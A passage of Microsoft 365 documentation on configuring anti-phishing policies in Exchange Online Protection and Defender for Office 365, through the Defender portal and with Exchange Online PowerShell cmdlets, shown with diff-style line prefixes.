- - Modify policy settings by clicking **Edit** in each section (custom policies or the default policy)
- - :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn on** or :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn off** (custom policies only)
- - :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** or :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** (custom policies only)
- - :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete policy** (custom policies only)
-
- :::image type="content" source="../../media/anti-phishing-policies-details-flyout.png" alt-text="The details flyout of a custom anti-phishing policy." lightbox="../../media/anti-phishing-policies-details-flyout.png":::
-
-The actions are described in the following subsections.
-
-### Use the Microsoft Defender portal to modify anti-phishing policies
-
-After you select the default anti-phishing policy or a custom policy by clicking anywhere in the row other than the check box next to the name, the policy settings are shown in the details flyout that opens. Select **Edit** in each section to modify the settings within the section. For more information about the settings, see the [create anti-phishing policies](#use-the-microsoft-defender-portal-to-create-anti-phishing-policies) section earlier in this article.
-
-For the default policy, you can't modify the name of the policy, and there are no recipient filters to configure (the policy applies to all recipients). But, you can modify all other settings in the policy.
-
-For the anti-phishing policies named **Standard Preset Security Policy** and **Strict Preset Security Policy** that are associated with [preset security policies](preset-security-policies.md), you can't modify the policy settings in the details flyout. Instead, you select :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **View preset security policies** in the details flyout to go to the **Preset security policies** page at <https://security.microsoft.com/presetSecurityPolicies> to modify the preset security policies.
-
-### Use the Microsoft Defender portal to enable or disable custom anti-phishing policies
-
-You can't disable the default anti-phishing policy (it's always enabled).
-
-You can't enable or disable the anti-phishing policies that are associated with Standard and Strict preset security policies. You enable or disable the Standard or Strict preset security policies on the **Preset security policies** page at <https://security.microsoft.com/presetSecurityPolicies>.
-
-After you select an enabled custom anti-phishing policy (the **Status** value is **On**), use either of the following methods to disable it:
--- **On the Anti-phishing page**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** \> **Disable selected policies**.-- **In the details flyout of the policy**: Select :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn off** at the top of the flyout.-
-After you select a disabled custom anti-phishing policy (the **Status** value is **Off**), use either of the following methods to enable it:
--- **On the Anti-phishing page**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** \> **Enable selected policies**.-- **In the details flyout of the policy**: Select :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn on** at the top of the flyout.-
-On the **Anti-phishing** page, the **Status** value of the policy is now **On** or **Off**.
-
-### Use the Microsoft Defender portal to set the priority of custom anti-phishing policies
-
-Anti-phishing policies are processed in the order that they're displayed on the **Anti-phishing** page:
--- The anti-phishing policy named **Strict Preset Security Policy** that's associated with the Strict preset security policy is always applied first (if the Strict preset security policy is [enabled](preset-security-policies.md#use-the-microsoft-defender-portal-to-assign-standard-and-strict-preset-security-policies-to-users)).-- The anti-phishing policy named **Standard Preset Security Policy** that's associated with the Standard preset security policy is always applied next (if the Standard preset security policy is enabled).-- Custom anti-phishing policies are applied next in priority order (if they're enabled):
- - A lower priority value indicates a higher priority (0 is the highest).
- - By default, a new policy is created with a priority that's lower than the lowest existing custom policy (the first is 0, the next is 1, etc.).
- - No two policies can have the same priority value.
-- The default anti-phishing policy always has the priority value **Lowest**, and you can't change it.-
-Anti-phishing protection stops for a recipient after the first policy is applied (the highest priority policy for that recipient). For more information, see [Order and precedence of email protection](how-policies-and-protections-are-combined.md).
-
-After you select the custom anti-phishing policy by clicking anywhere in the row other than the check box next to the name, you can increase or decrease the priority of the policy in the details flyout that opens:
--- The custom policy with the **Priority** value **0** on the **Anti-Phishing** page has the :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** action at the top of the details flyout.-- The custom policy with the lowest priority (highest **Priority** value; for example, **3**) has the :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** action at the top of the details flyout.-- If you have three or more policies, the policies between **Priority** 0 and the lowest priority have both the :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** and the :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** actions at the top of the details flyout.-
-When you're finished in the policy details flyout, select **Close**.
-
-Back on the **Anti-phishing** page, the order of the policy in the list matches the updated **Priority** value.
-
-### Use the Microsoft Defender portal to remove custom anti-phishing policies
-
-You can't remove the default anti-phishing policy or the anti-phishing policies named **Standard Preset Security Policy** and **Strict Preset Security Policy** that are associated with [preset security policies](preset-security-policies.md).
-
-After you select the custom anti-phishing policy, use either of the following methods to remove it:
--- **On the Anti-phishing page**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** \> **Delete selected policies**.-- **In the details flyout of the policy**: Select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete policy** at the top of the flyout.-
-Select **Yes** in the warning dialog that opens.
-
-On the **Anti-phishing** page, the deleted policy is no longer listed.
-
-## Use Exchange Online PowerShell to configure anti-phishing policies
-
-In PowerShell, the basic elements of an anti-phishing policy are:
--- **The anti-phish policy**: Specifies the phishing protections to enable or disable, the actions to apply for those protections, and other options.-- **The anti-phish rule**: Specifies the priority and recipient filters (who the policy applies to) for the associated anti-phish policy.-
-The difference between these two elements isn't obvious when you manage anti-phishing policies in the Microsoft Defender portal:
--- When you create a policy in the Defender portal, you're actually creating an anti-phish rule and the associated anti-phish policy at the same time using the same name for both.-- When you modify a policy in the Defender portal, settings related to the name, priority, enabled or disabled, and recipient filters modify the anti-phish rule. All other settings modify the associated anti-phish policy.-- When you remove a policy in the Defender portal, the anti-phish rule and the associated anti-phish policy are removed at the same time.-
-In Exchange Online PowerShell, the difference between anti-phish policies and anti-phish rules is apparent. You manage anti-phish policies by using the **\*-AntiPhishPolicy** cmdlets, and you manage anti-phish rules by using the **\*-AntiPhishRule** cmdlets.
--- In PowerShell, you create the anti-phish policy first, then you create the anti-phish rule, which identifies the associated policy that the rule applies to.-- In PowerShell, you modify the settings in the anti-phish policy and the anti-phish rule separately.-- When you remove an anti-phish policy from PowerShell, the corresponding anti-phish rule isn't automatically removed, and vice versa.-
-### Use PowerShell to create anti-phishing policies
-
-Creating an anti-phishing policy in PowerShell is a two-step process:
-
-1. Create the anti-phish policy.
-2. Create the anti-phish rule that specifies the anti-phish policy that the rule applies to.
-
- **Notes**:
--- You can create a new anti-phish rule and assign an existing, unassociated anti-phish policy to it. An anti-phish rule can't be associated with more than one anti-phish policy.--- You can configure the following settings on new anti-phish policies in PowerShell that aren't available in the Microsoft Defender portal until after you create the policy:-
- - Create the new policy as disabled (_Enabled_ `$false` on the **New-AntiPhishRule** cmdlet).
- - Set the priority of the policy during creation (_Priority_ _\<Number\>_) on the **New-AntiPhishRule** cmdlet).
--- A new anti-phish policy that you create in PowerShell isn't visible in the Microsoft Defender portal until you assign the policy to an anti-phish rule.-
-#### Step 1: Use PowerShell to create an anti-phish policy
-
-To create an anti-phish policy, use this syntax:
-
-```PowerShell
-New-AntiPhishPolicy -Name "<PolicyName>" [-AdminDisplayName "<Comments>"] [-EnableSpoofIntelligence <$true | $false>] [-AuthenticationFailAction <MoveToJmf | Quarantine>] [-HonorDmarcPolicy <$true | $false>] [-DmarcQuarantineAction <MoveToJmf | Quarantine>] [-DmarcRejectAction <Quarantine | Reject>] [-EnableUnauthenticatedSender <$true | $false>] [-EnableViaTag <$true | $false>] [-SpoofQuarantineTag <QuarantineTagName>]
-```
-
-This example creates an anti-phish policy named Research Quarantine with the following settings:
--- The description is: Research department policy.-- Changes the default action for spoofing detections to Quarantine and uses the default quarantine policy for the quarantined messages (we aren't using the _SpoofQuarantineTag_ parameter).-- Honoring `p=quarantine` and `p=reject` in sender DMARC policies is on by default (we aren't using the _HonorDmarcPolicy_ parameter, and the default value is `$true`).
- - Messages that fail DMARC where the sender's DMARC policy is `p=quarantine` are quarantined (we aren't using the _DmarcQuarantineAction_ parameter, and the default value is Quarantine).
- - Messages that fail DMARC where the sender's DMARC policy is `p=reject` are rejected (we aren't using the _DmarcRejectAction_ parameter, and the default value is Reject).
-
-```powershell
-New-AntiPhishPolicy -Name "Monitor Policy" -AdminDisplayName "Research department policy" -AuthenticationFailAction Quarantine
-```
-
-For detailed syntax and parameter information, see [New-AntiPhishPolicy](/powershell/module/exchange/New-AntiPhishPolicy).
-
-> [!TIP]
-> For detailed instructions to specify the quarantine policies to use in an anti-phish policy, see [Use PowerShell to specify the quarantine policy in anti-phishing policies](quarantine-policies.md#anti-phishing-policies).
-
-#### Step 2: Use PowerShell to create an anti-phish rule
-
-To create an anti-phish rule, use this syntax:
-
-```PowerShell
-New-AntiPhishRule -Name "<RuleName>" -AntiPhishPolicy "<PolicyName>" <Recipient filters> [<Recipient filter exceptions>] [-Comments "<OptionalComments>"]
-```
-
-This example creates an anti-phish rule named Research Department with the following conditions:
--- The rule is associated with the anti-phish policy named Research Quarantine.-- The rule applies to members of the group named Research Department.-- Because we aren't using the _Priority_ parameter, the default priority is used.-
-```powershell
-New-AntiPhishRule -Name "Research Department" -AntiPhishPolicy "Research Quarantine" -SentToMemberOf "Research Department"
-```
-
-For detailed syntax and parameter information, see [New-AntiPhishRule](/powershell/module/exchange/New-AntiPhishRule).
-
-### Use PowerShell to view anti-phish policies
-
-To view existing anti-phish policies, use the following syntax:
-
-```PowerShell
-Get-AntiPhishPolicy [-Identity "<PolicyIdentity>"] [| <Format-Table | Format-List> <Property1,Property2,...>]
-```
-
-This example returns a summary list of all anti-phish policies along with the specified properties.
-
-```PowerShell
-Get-AntiPhishPolicy | Format-Table Name,IsDefault
-```
-
-This example returns all the property values for the anti-phish policy named Executives.
-
-```PowerShell
-Get-AntiPhishPolicy -Identity "Executives"
-```
-
-For detailed syntax and parameter information, see [Get-AntiPhishPolicy](/powershell/module/exchange/Get-AntiPhishPolicy).
-
-### Use PowerShell to view anti-phish rules
-
-To view existing anti-phish rules, use the following syntax:
-
-```PowerShell
-Get-AntiPhishRule [-Identity "<RuleIdentity>"] [-State <Enabled | Disabled] [| <Format-Table | Format-List> <Property1,Property2,...>]
-```
-
-This example returns a summary list of all anti-phish rules along with the specified properties.
-
-```PowerShell
-Get-AntiPhishRule | Format-Table Name,Priority,State
-```
-
-To filter the list by enabled or disabled rules, run the following commands:
-
-```PowerShell
-Get-AntiPhishRule -State Disabled | Format-Table Name,Priority
-```
-
-```PowerShell
-Get-AntiPhishRule -State Enabled | Format-Table Name,Priority
-```
-
-This example returns all the property values for the anti-phish rule named Contoso Executives.
-
-```PowerShell
-Get-AntiPhishRule -Identity "Contoso Executives"
-```
-
-For detailed syntax and parameter information, see [Get-AntiPhishRule](/powershell/module/exchange/Get-AntiPhishrule).
-
-### Use PowerShell to modify anti-phish policies
-
-Other than the following items, the same settings are available when you modify an anti-phish policy in PowerShell as when you create a policy as described in [Step 1: Use PowerShell to create an anti-phish policy](#step-1-use-powershell-to-create-an-anti-phish-policy) earlier in this article.
--- The _MakeDefault_ switch that turns the specified policy into the default policy (applied to everyone, always **Lowest** priority, and you can't delete it) is available only when you modify an anti-phish policy in PowerShell.-- You can't rename an anti-phish policy (the **Set-AntiPhishPolicy** cmdlet has no _Name_ parameter). When you rename an anti-phishing policy in the Microsoft Defender portal, you're only renaming the anti-phish _rule_.-
-To modify an anti-phish policy, use this syntax:
-
-```PowerShell
-Set-AntiPhishPolicy -Identity "<PolicyName>" <Settings>
-```
-
-For detailed syntax and parameter information, see [Set-AntiPhishPolicy](/powershell/module/exchange/Set-AntiPhishPolicy).
-
-> [!TIP]
-> For detailed instructions to specify the quarantine policy to use in an anti-phish policy, see [Use PowerShell to specify the quarantine policy in anti-phishing policies](quarantine-policies.md#anti-phishing-policies).
-
-### Use PowerShell to modify anti-phish rules
-
-The only setting that's not available when you modify an anti-phish rule in PowerShell is the _Enabled_ parameter that allows you to create a disabled rule. To enable or disable existing anti-phish rules, see the next section.
-
-Otherwise, the same settings are available when you create a rule as described in the [Step 2: Use PowerShell to create an anti-phish rule](#step-2-use-powershell-to-create-an-anti-phish-rule) section earlier in this article.
-
-To modify an anti-phish rule, use this syntax:
-
-```PowerShell
-Set-AntiPhishRule -Identity "<RuleName>" <Settings>
-```
-
-For detailed syntax and parameter information, see [Set-AntiPhishRule](/powershell/module/exchange/set-antiphishrule).
-
-### Use PowerShell to enable or disable anti-phish rules
-
-Enabling or disabling an anti-phish rule in PowerShell enables or disables the whole anti-phishing policy (the anti-phish rule and the assigned anti-phish policy). You can't enable or disable the default anti-phishing policy (it's always applied to all recipients).
-
-To enable or disable an anti-phish rule in PowerShell, use this syntax:
-
-```PowerShell
-<Enable-AntiPhishRule | Disable-AntiPhishRule> -Identity "<RuleName>"
-```
-
-This example disables the anti-phish rule named Marketing Department.
-
-```PowerShell
-Disable-AntiPhishRule -Identity "Marketing Department"
-```
-
-This example enables same rule.
-
-```PowerShell
-Enable-AntiPhishRule -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Enable-AntiPhishRule](/powershell/module/exchange/enable-antiphishrule) and [Disable-AntiPhishRule](/powershell/module/exchange/disable-antiphishrule).
-
-### Use PowerShell to set the priority of anti-phish rules
-
-The highest priority value you can set on a rule is 0. The lowest value you can set depends on the number of rules. For example, if you have five rules, you can use the priority values 0 through 4. Changing the priority of an existing rule can have a cascading effect on other rules. For example, if you have five custom rules (priorities 0 through 4), and you change the priority of a rule to 2, the existing rule with priority 2 is changed to priority 3, and the rule with priority 3 is changed to priority 4.
-
-To set the priority of an anti-phish rule in PowerShell, use the following syntax:
-
-```PowerShell
-Set-AntiPhishRule -Identity "<RuleName>" -Priority <Number>
-```
-
-This example sets the priority of the rule named Marketing Department to 2. All existing rules that have a priority less than or equal to 2 are decreased by 1 (their priority numbers are increased by 1).
-
-```PowerShell
-Set-AntiPhishRule -Identity "Marketing Department" -Priority 2
-```
-
-**Notes**:
--- To set the priority of a new rule when you create it, use the _Priority_ parameter on the **New-AntiPhishRule** cmdlet instead.-- The default anti-phish policy doesn't have a corresponding anti-phish rule, and it always has the unmodifiable priority value **Lowest**.-
-### Use PowerShell to remove anti-phish policies
-
-When you use PowerShell to remove an anti-phish policy, the corresponding anti-phish rule isn't removed.
-
-To remove an anti-phish policy in PowerShell, use this syntax:
-
-```PowerShell
-Remove-AntiPhishPolicy -Identity "<PolicyName>"
-```
-
-This example removes the anti-phish policy named Marketing Department.
-
-```PowerShell
-Remove-AntiPhishPolicy -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Remove-AntiPhishPolicy](/powershell/module/exchange/Remove-AntiPhishPolicy).
-
-### Use PowerShell to remove anti-phish rules
-
-When you use PowerShell to remove an anti-phish rule, the corresponding anti-phish policy isn't removed.
-
-To remove an anti-phish rule in PowerShell, use this syntax:
-
-```PowerShell
-Remove-AntiPhishRule -Identity "<PolicyName>"
-```
-
-This example removes the anti-phish rule named Marketing Department.
-
-```PowerShell
-Remove-AntiPhishRule -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Remove-AntiPhishRule](/powershell/module/exchange/Remove-AntiPhishRule).
-
-## How do you know these procedures worked?
-
-To verify that you've successfully configured anti-phishing policies in EOP, do any of the following steps:
--- On the **Anti-phishing** page in the Microsoft Defender portal at <https://security.microsoft.com/antiphishing>, verify the list of policies, their **Status** values, and their **Priority** values. To view more details, select the policy from the list by clicking on the name and viewing the details in the flyout that appears.--- In Exchange Online PowerShell, replace \<Name\> with the name of the policy or rule, run the following command, and verify the settings:-
- ```PowerShell
- Get-AntiPhishPolicy -Identity "<Name>"
- ```
-
- ```PowerShell
- Get-AntiPhishRule -Identity "<Name>"
- ```
security Anti Phishing Policies Mdo Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/anti-phishing-policies-mdo-configure.md
- Title: Configure anti-phishing policies in Microsoft Defender for Office 365
- - NOCSH
-----
- - m365-security
- - tier2
-
-description: Admins can learn how to create, modify, and delete the advanced anti-phishing policies that are available in organizations with Microsoft Defender for Office 365.
- Previously updated : 4/8/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Configure anti-phishing policies in Microsoft Defender for Office 365
--
-In organizations with Microsoft Defender for Office 365, anti-phishing policies provide the following types of protection:
--- The same anti-spoofing protection that's available in Exchange Online Protection (EOP). For more information, see [Spoof settings](anti-phishing-policies-about.md#spoof-settings).-- Anti-impersonation protection from other types of phishing attacks. For more information, see [Exclusive settings in anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-about.md#exclusive-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365).-
-The default anti-phishing policy automatically applies to all recipients. For greater granularity, you can also create custom anti-phishing policies that apply to specific users, groups, or domains in your organization.
-
-You configure anti-phishing policies in the Microsoft Defender portal or in Exchange Online PowerShell.
-
-For anti-phishing policy procedures in organizations without Defender for Office 365, see [Configure anti-phishing policies in EOP](anti-phishing-policies-eop-configure.md).
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Anti-phishing** page, use <https://security.microsoft.com/antiphishing>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.
- - [Exchange Online permissions](/exchange/permissions-exo/permissions-exo):
- - _Add, modify, and delete policies_: Membership in the **Organization Management** or **Security Administrator** role groups.
- - _Read-only access to policies_: Membership in the **Global Reader**, **Security Reader**, or **View-Only Organization Management** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, **Global Reader**, or **Security Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
--- For our recommended settings for anti-phishing policies in Defender for Office 365, see [Anti-phishing policy in Defender for Office 365 settings](recommended-settings-for-eop-and-office365.md#anti-phishing-policy-settings-in-microsoft-defender-for-office-365).-
- > [!TIP]
- > Settings in the default or custom anti-phishing policies are ignored if a recipient is also included in the [Standard or Strict preset security policies](preset-security-policies.md). For more information, see [Order and precedence of email protection](how-policies-and-protections-are-combined.md).
--- Allow up to 30 minutes for a new or updated policy to be applied.-
-## Use the Microsoft Defender portal to create anti-phishing policies
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Anti-phishing** in the **Policies** section. To go directly to the **Anti-phishing** page, use <https://security.microsoft.com/antiphishing>.
-
-2. On the **Anti-phishing** page, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create** to open the new anti-phishing policy wizard.
-
-3. On the **Policy name** page, configure these settings:
- - **Name**: Enter a unique, descriptive name for the policy.
- - **Description**: Enter an optional description for the policy.
-
- When you're finished on the **Policy name** page, select **Next**.
-
-4. On the **Users, groups, and domains** page, identify the internal recipients that the policy applies to (recipient conditions):
- - **Users**: The specified mailboxes, mail users, or mail contacts.
- - **Groups**:
- - Members of the specified distribution groups or mail-enabled security groups (dynamic distribution groups aren't supported).
- - The specified Microsoft 365 Groups.
- - **Domains**: All recipients in the organization with a primary email address in the specified [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).
-
- Click in the appropriate box, start typing a value, and select the value that you want from the results. Repeat this process as many times as necessary. To remove an existing value, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the value.
-
- For users or groups, you can use most identifiers (name, display name, alias, email address, account name, etc.), but the corresponding display name is shown in the results. For users or groups, enter an asterisk (\*) by itself to see all available values.
-
- You can use a condition only once, but the condition can contain multiple values:
-
- - Multiple **values** of the **same condition** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, the policy is applied to them.
- - Different **types of conditions** use AND logic. The recipient must match **all** of the specified conditions for the policy to apply to them. For example, you configure a condition with the following values:
- - Users: `romain@contoso.com`
- - Groups: Executives
-
- The policy is applied to `romain@contoso.com` _only_ if he's also a member of the Executives group. Otherwise, the policy isn't applied to him.
-
- - **Exclude these users, groups, and domains**: To add exceptions for the internal recipients that the policy applies to (recipient exceptions), select this option and configure the exceptions.
-
- You can use an exception only once, but the exception can contain multiple values:
-
- - Multiple **values** of the **same exception** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, the policy isn't applied to them.
- - Different **types of exceptions** use OR logic (for example, _\<recipient1\>_ or _\<member of group1\>_ or _\<member of domain1\>_). If the recipient matches **any** of the specified exception values, the policy isn't applied to them.
-
- When you're finished on the **Users, groups, and domains** page, select **Next**.
-
-5. On the **Phishing threshold & protection** page, configure the following settings:
-
- - **Phishing email threshold**: Use the slider to select one of the following values:
- - **1 - Standard** (This is the default value.)
- - **2 - Aggressive**
- - **3 - More aggressive**
- - **4 - Most aggressive**
-
- For more information about this setting, see [Advanced phishing thresholds in anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-about.md#advanced-phishing-thresholds-in-anti-phishing-policies-in-microsoft-defender-for-office-365).
-
- - **Impersonation**: These settings are conditions for the policy that identify specific senders to look for (individually or by domain) in the From address of inbound messages. For more information, see [Impersonation settings in anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365).
-
- - **Enable users to protect**: This setting isn't selected by default. To turn on user impersonation protection, select the check box, and then select the **Manage (nn) sender(s)** link. You identify the action for user impersonation detections on the next page.
-
- You identify the internal and external senders to protect by the combination of their display name and email address.
-
- Select :::image type="icon" source="../../media/m365-cc-sc-add-internal-icon.png" border="false"::: **Add user**. In the **Add user** flyout that opens, do the following steps:
-
- - **Internal users**: Click in the **Add a valid email** box or start typing the user's email address. Select the email address in the **Suggested contacts** dropdown list that appears. The user's display name is added to the **Add a name** box (which you can change). When you're finished selecting the user, select **Add**.
-
- - **External users**: Type the external user's full email address in the **Add a valid email** box, and then select the email address in the **Suggested contacts** dropdown list that appears. The email address is also added in the **Add a name** box (which you can change to a display name).
-
- The users you added are listed on the **Add user** flyout by **Name** and **Email address**. To remove a user, select :::image type="icon" source="../../media/m365-cc-sc-close-icon.png" border="false"::: next to the entry.
-
- When you're finished on the **Add user** flyout, select **Add**.
-
- Back on the **Manage senders for impersonation protection** flyout, the users you selected are listed by **Display name** and **Sender email address**.
-
- To change the list of entries from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
- Use the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Search** box to find entries on the flyout.
-
- To add entries, select :::image type="icon" source="../../media/m365-cc-sc-add-internal-icon.png" border="false"::: **Add user** and repeat the previous steps.
-
- To remove entries, do either of the following steps:
-
- - Select one or more entries by selecting the round check box that appears in the blank area next to the display name value.
- - Select all entries at once by selecting the round check box that appears in the blank area next to the **Display name** column header.
-
- When you're finished on the **Manage senders for impersonation protection** flyout, select **Done** to return to the **Phishing threshold & protection** page.
-
- > [!NOTE]
- > You can specify a maximum of 350 users for user impersonation protection in each anti-phishing policy.
- >
- > User impersonation protection does not work if the sender and recipient have previously communicated via email. If the sender and recipient have never communicated via email, the message can be identified as an impersonation attempt.
- >
- > You might get the error "The email address already exists" if you try to add a user to user impersonation protection when that email address is already specified for user impersonation protection in another anti-phishing policy. This error occurs only in the Defender portal. You won't get the error if you use the corresponding _TargetedUsersToProtect_ parameter in the **New-AntiPhishPolicy** or **Set-AntiPhishPolicy** cmdlets in Exchange Online PowerShell.
-
- - **Enable domains to protect**: This setting isn't selected by default. To turn on domain impersonation protection, select the check box, and then configure one or both of the following settings that appear. You identify the action for domain impersonation detections on the next page.
-
- - **Include the domains I own**: To turn on this setting, select the check box. To view the domains that you own, select **View my domains**.
-
- - **Include custom domains**: To turn on this setting, select the check box, and then select the **Manage (nn) custom domain(s)** link. In the **Manage custom domains for impersonation protection** flyout that opens, do the following steps:
-
- Select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add domains**.
-
- In the **Add custom domains** flyout that appears, click in the **Domain** box, enter a domain value, and then select the value that's displayed below the box. Repeat this step as many times as necessary.
-
- The domains you added are listed on the **Add custom domains** flyout. To remove the domain, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the value.
-
- When you're finished on the **Add custom domains** flyout, select **Add domains**
-
- Back on the **Manage custom domains for impersonation protection** flyout, the domains you entered are listed.
-
- To change the list of entries from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
- Use the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Search** box to find entries on the flyout.
-
- To add entries, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add domains** and repeat the previous steps.
-
- To remove entries, do either of the following steps:
-
- - Select one or more entries by selecting the round check box that appears in the blank area next to the domain value.
- - Select all entries at once by selecting the round check box that appears in the blank area next to the **Domains** column header.
-
- When you're finished on the **Manage custom domains for impersonation protection** flyout, select **Done** to return to the **Phishing threshold & protection** page.
-
- - **Add trusted senders and domains**: Specify impersonation protection exceptions for the policy by selecting **Manage (nn) trusted sender(s) and domain(s)**. On the **Manage custom domains for impersonation protection** flyout that opens, you enter senders on the **Sender** tab and domains on the **Domain** tab.
-
- > [!NOTE]
- > The maximum number of trusted sender and domain entries is 1024.
-
- - **Sender** tab: Select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add senders**.
-
- In the **Add trusted senders** flyout that opens, enter an email address in the **Add a valid email** box, and then select **Add**. Repeat this step as many times as necessary. To remove an existing entry, select :::image type="icon" source="../../media/m365-cc-sc-close-icon.png" border="false"::: for the entry.
-
- When you're finished on the **Add trusted senders** flyout, select **Add**.
-
- Back on the **Sender** tab, the senders you entered are listed.
-
- To change the list of entries from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
- Use the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Search** box to find entries on the flyout.
-
- To add entries, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add senders** and repeat the previous steps.
-
- To remove entries, do either of the following steps:
-
- - Select one or more entries by selecting the round check box that appears in the blank area next to the sender value.
- - Select all entries at once by selecting the round check box that appears in the blank area next to the **Sender** column header.
-
- When you're finished on the **Sender** tab of the **Manage custom domains for impersonation protection** flyout, select the **Domain** tab to add domains, or select **Done** to return to the **Phishing threshold & protection** page.
-
- > [!TIP]
- > If Microsoft 365 system messages from the following senders are identified as impersonation attempts, you can add the senders to the trusted senders list:
- >
- > - `noreply@email.teams.microsoft.com`
- > - `noreply@emeaemail.teams.microsoft.com`
- > - `no-reply@sharepointonline.com`
- > - `noreply@planner.office365.com`
-
- - **Domain** tab: Select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add domains**. In the **Add trusted domains** flyout that opens, enter domain in the **Domain** box, and then select the domain in dropdown list that appears. Repeat this step as many times as necessary. To remove an existing entry, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: for the entry.
-
- When you're finished on the **Add trusted domains** flyout, select **Add domains**.
-
- Back on the **Domain** tab, the domains you added are now listed.
-
- To change the list of entries from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
- Use the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Search** box to find entries on the tab.
-
- To add entries, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add domains** and repeat the previous steps.
-
- To remove entries, do either of the following steps:
-
- - Select one or more entries by selecting the round check box that appears in the blank area next to the domain value.
- - Select all entries at once by selecting the round check box that appears in the blank area next to the **Domain** column header.
-
- When you're finished on the **Domain** tab of the **Manage custom domains for impersonation protection** flyout, select the **Sender** tab to add senders, or select **Done** to return to the **Phishing threshold & protection** page.
-
- > [!NOTE]
- > Trusted domain entries don't include subdomains of the specified domain. You need to add an entry for each subdomain.
-
- When you're finished on the **Manage custom domains for impersonation protection** flyout, select **Done**to return to the **Phishing threshold & protection** page.
-
- - **Enable mailbox intelligence**: This setting is selected by default, and we recommend that you leave it selected. To turn off mailbox intelligence, clear the check box.
-
